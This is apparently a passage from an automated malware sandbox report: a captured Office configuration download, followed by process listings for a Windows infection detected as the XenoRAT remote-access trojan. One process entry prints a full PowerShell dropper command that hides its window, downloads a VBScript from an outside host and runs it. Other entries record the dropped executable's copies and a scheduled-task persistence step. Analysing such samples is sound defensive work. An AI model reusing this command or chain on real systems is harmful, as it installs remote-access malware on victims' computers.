                                                                                                                                                Host: ecs.office.com
                                                                                                                                                2024-12-09 05:52:38 UTC1180INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: no-cache,max-age=14400
                                                                                                                                                Content-Length: 153570
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Expires: Mon, 09 Dec 2024 09:52:37 GMT
                                                                                                                                                ETag: "M6TuJPaDSPPL4PYR84lvamGXbguhsfjZMYkukuDEe7w="
                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                request-id: dd5bb81f-b3bd-3b79-2557-22e653ea87f8
                                                                                                                                                X-BackEndHttpStatus: 200
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                Report-To: {"group":"NelEcsUpload1","max_age":604800,"endpoints":[{"url":"https://ecs.nel.measure.office.net?TenantId=Office&DestinationEndpoint=MIRA-WW-DX0&FrontEnd=MIRA"}],"include_subdomains":true}
                                                                                                                                                NEL: {"report_to":"NelEcsUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                                                                                                                                X-Proxy-RoutingCorrectness: 1
                                                                                                                                                X-MSEdge-Ref: MIRA: dd5bb81f-b3bd-3b79-2557-22e653ea87f8 DX0P273CA0016 2024-12-09T05:52:29.350Z
                                                                                                                                                Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                                                                X-Proxy-BackendServerStatus: 200
                                                                                                                                                X-FirstHopCafeEFZ: DXB
                                                                                                                                                X-FEProxyInfo: DX0P273CA0016.AREP273.PROD.OUTLOOK.COM
                                                                                                                                                X-FEEFZInfo: DXB
                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                X-FEServer: DX0P273CA0016
                                                                                                                                                Date: Mon, 09 Dec 2024 05:52:29 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-12-09 05:52:38 UTC533INData Raw: 7b 22 45 43 53 22 3a 7b 22 43 6f 6e 66 69 67 4c 6f 67 54 61 72 67 65 74 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 63 37 32 65 61 32 38 37 2d 65 64 37 37 2d 34 66 61 36 2d 61 34 38 30 2d 33 37 31 32 34 30 36 63 33 36 37 65 22 3a 22 61 6b 61 2e 6d 73 2f 45 63 73 43 61 6e 61 72 79 22 2c 22 43 61 63 68 65 45 78 70 69 72 79 49 6e 4d 69 6e 22 3a 32 34 30 2c 22 45 6e 61 62 6c 65 53 6d 61 72 74 45 54 61 67 22 3a 31 2c 22 43 6f 6e 66 69 67 49 64 44 65 6c 69 6d 69 74 65 72 49 6e 4c 6f 67 22 3a 22 3b 22 7d 2c 22 4e 61 6e 63 79 4f 66 66 69 63 65 54 65 61 6d 22 3a 7b 22 7a 68 65 74 61 6e 34 31 32 32 30 32 31 22 3a 74 72 75 65 7d 2c 22 4f 66 66 69 63 65 5f 41 63 63 65 73 73 22 3a 7b 22 55 73 65 46 6f 72 6d 54 68 65 6d 65 49 66 4e 6f 50 61 72 65 6e 74 53 65 63 74 69 6f 6e
                                                                                                                                                Data Ascii: {"ECS":{"ConfigLogTarget":"default","c72ea287-ed77-4fa6-a480-3712406c367e":"aka.ms/EcsCanary","CacheExpiryInMin":240,"EnableSmartETag":1,"ConfigIdDelimiterInLog":";"},"NancyOfficeTeam":{"zhetan4122021":true},"Office_Access":{"UseFormThemeIfNoParentSection
                                                                                                                                                2024-12-09 05:52:38 UTC15158INData Raw: 46 65 61 74 75 72 65 22 3a 7b 22 42 6c 6f 63 6b 65 64 47 72 61 70 68 69 63 73 41 64 61 70 74 65 72 31 22 3a 22 33 32 39 30 32 3b 30 3b 30 3b 30 3b 38 34 34 34 32 34 39 33 30 37 38 38 33 32 30 32 3b 32 3b 30 3b 30 3b 30 3b 30 3b 30 22 2c 22 42 6c 6f 63 6b 65 64 47 72 61 70 68 69 63 73 41 64 61 70 74 65 72 32 22 3a 22 33 32 39 30 32 3b 30 3b 30 3b 30 3b 38 34 34 34 32 34 39 33 30 37 38 38 32 39 36 37 3b 32 3b 30 3b 30 3b 30 3b 30 3b 30 22 2c 22 42 6c 6f 63 6b 65 64 47 72 61 70 68 69 63 73 41 64 61 70 74 65 72 33 22 3a 22 33 32 39 30 32 3b 30 3b 30 3b 30 3b 38 34 34 34 32 34 39 33 30 37 38 38 33 32 31 31 3b 32 3b 30 3b 30 3b 30 3b 30 3b 30 22 2c 22 42 6c 6f 63 6b 65 64 47 72 61 70 68 69 63 73 41 64 61 70 74 65 72 34 22 3a 22 33 32 39 30 32 3b 30 3b 30 3b 30
                                                                                                                                                Data Ascii: Feature":{"BlockedGraphicsAdapter1":"32902;0;0;0;8444249307883202;2;0;0;0;0;0","BlockedGraphicsAdapter2":"32902;0;0;0;8444249307882967;2;0;0;0;0;0","BlockedGraphicsAdapter3":"32902;0;0;0;8444249307883211;2;0;0;0;0;0","BlockedGraphicsAdapter4":"32902;0;0;0
                                                                                                                                                2024-12-09 05:52:38 UTC16384INData Raw: 43 41 41 54 67 42 6c 41 47 6b 41 64 41 42 6f 41 47 55 41 63 67 41 67 41 47 67 41 5a 51 42 73 41 48 41 41 5a 67 42 31 41 47 77 41 49 41 42 76 41 48 49 41 49 41 42 31 41 47 34 41 61 41 42 6c 41 47 77 41 63 41 42 6d 41 48 55 41 62 41 41 41 45 41 49 42 45 67 73 30 41 43 41 41 4c 51 41 67 41 45 67 41 5a 51 42 73 41 48 41 41 5a 67 42 31 41 47 77 41 41 42 41 43 41 52 49 56 4e 51 41 67 41 43 30 41 49 41 42 46 41 48 67 41 64 41 42 79 41 47 55 41 62 51 42 6c 41 47 77 41 65 51 41 67 41 47 67 41 5a 51 42 73 41 48 41 41 5a 67 42 31 41 47 77 41 41 41 42 4c 43 67 45 51 42 41 45 4b 45 41 49 42 45 69 70 51 41 47 77 41 5a 51 42 68 41 48 4d 41 5a 51 41 67 41 47 51 41 5a 51 42 7a 41 47 4d 41 63 67 42 70 41 47 49 41 5a 51 41 67 41 48 63 41 61 41 42 35 41 43 41 41 65 51 42 76
                                                                                                                                                Data Ascii: CAATgBlAGkAdABoAGUAcgAgAGgAZQBsAHAAZgB1AGwAIABvAHIAIAB1AG4AaABlAGwAcABmAHUAbAAAEAIBEgs0ACAALQAgAEgAZQBsAHAAZgB1AGwAABACARIVNQAgAC0AIABFAHgAdAByAGUAbQBlAGwAeQAgAGgAZQBsAHAAZgB1AGwAAABLCgEQBAEKEAIBEipQAGwAZQBhAHMAZQAgAGQAZQBzAGMAcgBpAGIAZQAgAHcAaAB5ACAAeQBv
                                                                                                                                                2024-12-09 05:52:38 UTC16384INData Raw: 61 32 30 30 30 30 30 31 31 33 5c 22 2c 5c 22 70 5c 22 3a 32 2c 5c 22 61 5c 22 3a 38 37 37 36 7d 2c 7b 5c 22 73 5c 22 3a 5c 22 77 61 32 30 30 30 30 31 34 38 32 5c 22 2c 5c 22 70 5c 22 3a 32 2c 5c 22 61 5c 22 3a 34 34 37 39 7d 2c 7b 5c 22 73 5c 22 3a 5c 22 77 61 31 30 34 33 38 30 34 34 39 5c 22 2c 5c 22 70 5c 22 3a 32 2c 5c 22 61 5c 22 3a 37 36 39 35 7d 2c 7b 5c 22 73 5c 22 3a 5c 22 77 61 31 30 34 33 37 39 32 37 39 5c 22 2c 5c 22 70 5c 22 3a 32 2c 5c 22 61 5c 22 3a 32 35 32 33 7d 2c 7b 5c 22 73 5c 22 3a 5c 22 77 61 32 30 30 30 30 30 37 32 39 5c 22 2c 5c 22 70 5c 22 3a 32 2c 5c 22 61 5c 22 3a 32 31 30 35 7d 2c 7b 5c 22 73 5c 22 3a 5c 22 77 61 31 30 34 33 38 31 30 36 33 5c 22 2c 5c 22 70 5c 22 3a 32 2c 5c 22 61 5c 22 3a 31 38 34 33 7d 2c 7b 5c 22 73 5c 22 3a
                                                                                                                                                Data Ascii: a200000113\",\"p\":2,\"a\":8776},{\"s\":\"wa200001482\",\"p\":2,\"a\":4479},{\"s\":\"wa104380449\",\"p\":2,\"a\":7695},{\"s\":\"wa104379279\",\"p\":2,\"a\":2523},{\"s\":\"wa200000729\",\"p\":2,\"a\":2105},{\"s\":\"wa104381063\",\"p\":2,\"a\":1843},{\"s\":
                                                                                                                                                2024-12-09 05:52:38 UTC16384INData Raw: 74 72 75 65 2c 22 47 72 61 6d 6d 61 72 43 68 65 63 6b 69 6e 67 2e 45 6e 67 6c 69 73 68 45 6e 74 52 61 63 69 61 6c 42 69 61 73 43 61 70 69 74 61 6c 69 7a 61 74 69 6f 6e 6f 66 41 62 6f 72 69 67 69 6e 61 6c 22 3a 74 72 75 65 2c 22 47 72 61 6d 6d 61 72 43 68 65 63 6b 69 6e 67 2e 45 6e 67 6c 69 73 68 45 6e 74 52 61 63 69 61 6c 42 69 61 73 43 61 70 69 74 61 6c 69 7a 61 74 69 6f 6e 6f 66 49 6e 64 69 67 65 6e 6f 75 73 22 3a 74 72 75 65 2c 22 57 6f 72 64 2e 43 70 4c 65 73 73 4c 69 6e 65 54 65 6c 65 6d 65 74 72 79 22 3a 74 72 75 65 2c 22 41 75 74 68 65 6e 74 69 63 61 74 65 64 50 72 6f 76 69 64 65 72 73 53 65 61 72 63 68 52 65 71 75 65 73 74 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 47 72 61 6d 6d 61 72 43 68 65 63 6b 69 6e 67 2e 42 72 61 7a 69 6c 69 61 6e 43 6f
                                                                                                                                                Data Ascii: true,"GrammarChecking.EnglishEntRacialBiasCapitalizationofAboriginal":true,"GrammarChecking.EnglishEntRacialBiasCapitalizationofIndigenous":true,"Word.CpLessLineTelemetry":true,"AuthenticatedProvidersSearchRequestEnabled":true,"GrammarChecking.BrazilianCo
                                                                                                                                                2024-12-09 05:52:38 UTC16384INData Raw: 41 64 64 41 63 74 69 76 69 74 79 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 41 63 74 69 76 69 74 79 4c 6f 67 43 61 63 68 65 44 6f 63 75 6d 65 6e 74 49 6e 66 6f 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 41 63 74 69 76 69 74 79 4c 6f 67 45 6e 74 72 79 46 69 6e 61 6c 69 7a 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 41 63 74 69 76 69 74 79 4c 6f 67 46 69 6c 74 65 72 4f 75 74 43 75 72 72 65 6e 74 55 73 65 72 41 63 74 69 76 69 74 69 65 73 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 41 63 74 69 76 69 74 79 4c 6f 67 4c 6f 61 64 46 72 6f 6d 53 74 72 65 61 6d 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 41 63 74 69 76 69 74 79 4c 6f 67 53 61 76 65 54 6f 53 74 72 65
                                                                                                                                                Data Ascii: AddActivity":{"EventFlag":512},"ActivityLogCacheDocumentInfo":{"EventFlag":512},"ActivityLogEntryFinalize":{"EventFlag":512},"ActivityLogFilterOutCurrentUserActivities":{"EventFlag":512},"ActivityLogLoadFromStream":{"EventFlag":512},"ActivityLogSaveToStre
                                                                                                                                                2024-12-09 05:52:38 UTC16384INData Raw: 22 3a 7b 22 41 63 74 69 6f 6e 41 49 22 3a 7b 22 45 76 65 6e 74 73 22 3a 7b 22 4c 61 74 65 6e 63 79 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 55 73 61 67 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 43 68 61 74 45 76 65 6e 74 73 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 45 72 72 6f 72 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 53 68 6f 77 4d 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 43 6f 6d 6d 61 6e 64 69 6e 67 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 4f 66 66 69 63 65 4a 73 4f 70 65 72 61 74 69 6f 6e 73 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 7d 7d 7d 7d 2c 22 50 65 72
                                                                                                                                                Data Ascii: ":{"ActionAI":{"Events":{"Latency":{"EventFlag":48896},"Usage":{"EventFlag":48896},"ChatEvents":{"EventFlag":48896},"Error":{"EventFlag":48896},"ShowMe":{"EventFlag":48896},"Commanding":{"EventFlag":48896},"OfficeJsOperations":{"EventFlag":48896}}}}},"Per
                                                                                                                                                2024-12-09 05:52:38 UTC16384INData Raw: 65 74 44 72 70 43 6f 72 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 44 6f 63 75 6d 65 6e 74 52 65 63 6f 76 65 72 79 4d 73 6f 48 72 42 65 67 69 6e 4d 6f 64 69 66 79 44 72 70 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 54 69 74 6c 65 42 61 72 53 61 76 65 55 69 4d 61 6e 61 67 65 72 57 72 69 74 65 53 74 61 74 75 73 54 6f 54 69 74 6c 65 42 61 72 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 4c 6f 61 64 43 73 69 44 6c 6c 46 6f 72 43 6c 69 63 6b 32 52 75 6e 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 49 73 53 65 72 76 65 72 43 61 63 68 65 64 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 4d 61 6e 75 61 6c 53 61 76 65 55 73 61 67 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61
                                                                                                                                                Data Ascii: etDrpCore":{"EventFlag":2},"DocumentRecoveryMsoHrBeginModifyDrp":{"EventFlag":2},"TitleBarSaveUiManagerWriteStatusToTitleBar":{"EventFlag":2},"LoadCsiDllForClick2RunEnvironment":{"EventFlag":2},"IsServerCached":{"EventFlag":2},"ManualSaveUsage":{"EventFla
                                                                                                                                                2024-12-09 05:52:38 UTC16384INData Raw: 65 2c 22 55 73 65 54 65 78 74 43 61 63 68 65 34 22 3a 74 72 75 65 2c 22 46 55 73 65 4c 69 73 74 52 65 66 61 63 74 6f 72 73 4a 61 6e 32 30 32 33 22 3a 74 72 75 65 2c 22 45 6e 61 62 6c 65 4c 69 6e 65 64 50 61 67 65 42 61 63 6b 67 72 6f 75 6e 64 22 3a 74 72 75 65 2c 22 4c 6f 67 57 6f 72 64 46 69 73 68 62 6f 77 6c 49 6e 6b 54 65 6c 65 6d 65 74 72 79 22 3a 74 72 75 65 2c 22 46 69 78 41 31 31 79 48 61 6e 67 49 6e 54 65 78 74 52 61 6e 67 65 44 65 6c 65 74 69 6f 6e 22 3a 74 72 75 65 2c 22 43 68 65 63 6b 46 6f 72 41 6e 63 68 6f 72 65 64 53 75 62 64 6f 63 73 49 6e 43 43 73 22 3a 74 72 75 65 2c 22 55 73 65 46 6f 72 6d 61 74 74 69 6e 67 52 75 6e 46 6f 72 43 6f 6d 70 61 72 65 46 6f 72 6d 61 74 73 22 3a 74 72 75 65 2c 22 55 73 65 46 6f 72 6d 61 74 43 61 63 68 65 35 22
                                                                                                                                                Data Ascii: e,"UseTextCache4":true,"FUseListRefactorsJan2023":true,"EnableLinedPageBackground":true,"LogWordFishbowlInkTelemetry":true,"FixA11yHangInTextRangeDeletion":true,"CheckForAnchoredSubdocsInCCs":true,"UseFormattingRunForCompareFormats":true,"UseFormatCache5"
                                                                                                                                                2024-12-09 05:52:38 UTC693INData Raw: 2c 62 65 6c 6f 77 6f 70 65 6e 64 69 76 69 64 65 72 3a 35 34 32 35 35 37 2c 6f 65 65 6e 61 62 6c 65 6f 73 66 69 64 65 6e 74 69 74 79 6d 61 6e 61 67 65 72 3a 34 34 39 39 31 39 2c 34 63 36 68 64 32 37 39 3a 34 36 33 37 32 31 2c 67 62 30 38 64 37 35 32 3a 32 39 32 31 32 32 2c 64 33 67 69 65 35 36 34 3a 32 38 33 38 35 33 2c 39 39 66 31 64 36 31 36 3a 32 38 33 38 35 34 2c 6f 65 6d 61 63 33 35 38 3a 32 30 35 30 32 22 2c 22 4f 66 66 69 63 65 5f 4f 66 66 69 63 65 49 6e 73 69 64 65 72 22 3a 22 50 2d 52 2d 37 31 33 36 30 2d 31 38 2d 31 39 22 2c 22 4f 66 66 69 63 65 5f 4f 6e 65 4e 6f 74 65 22 3a 22 50 2d 58 2d 31 31 31 37 37 38 30 2d 31 2d 33 2c 50 2d 58 2d 31 30 36 35 38 31 32 2d 31 2d 33 2c 50 2d 58 2d 37 36 35 35 35 2d 31 2d 33 2c 30 35 33 64 39 34 30 33 3a 35 30
                                                                                                                                                Data Ascii: ,belowopendivider:542557,oeenableosfidentitymanager:449919,4c6hd279:463721,gb08d752:292122,d3gie564:283853,99f1d616:283854,oemac358:20502","Office_OfficeInsider":"P-R-71360-18-19","Office_OneNote":"P-X-1117780-1-3,P-X-1065812-1-3,P-X-76555-1-3,053d9403:50


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:1
                                                                                                                                                Start time:00:52:17
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:00:52:17
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:00:52:25
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs"
                                                                                                                                                Imagebase:0x7ff71bc30000
                                                                                                                                                File size:170'496 bytes
                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:00:52:28
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                Imagebase:0x50000
                                                                                                                                                File size:1'620'872 bytes
                                                                                                                                                MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:00:52:31
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                                                File size:55'320 bytes
                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:00:52:37
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe"
                                                                                                                                                Imagebase:0x520000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000015.00000002.1498518965.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000015.00000002.1498518965.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000015.00000002.1498518965.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:22
                                                                                                                                                Start time:00:52:38
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0xa90000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:00:52:38
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0xed0000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:00:52:38
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0x550000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000018.00000002.1481629234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:02:03:14
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe"
                                                                                                                                                Imagebase:0x720000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000019.00000002.1512091151.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000019.00000002.1512091151.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000019.00000002.1512091151.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000019.00000002.1512091151.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:02:03:15
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Imagebase:0x510000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:27
                                                                                                                                                Start time:02:03:15
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Imagebase:0xdd0000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:28
                                                                                                                                                Start time:02:03:15
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Imagebase:0xf10000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:29
                                                                                                                                                Start time:02:03:26
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F
                                                                                                                                                Imagebase:0x2a0000
                                                                                                                                                File size:187'904 bytes
                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
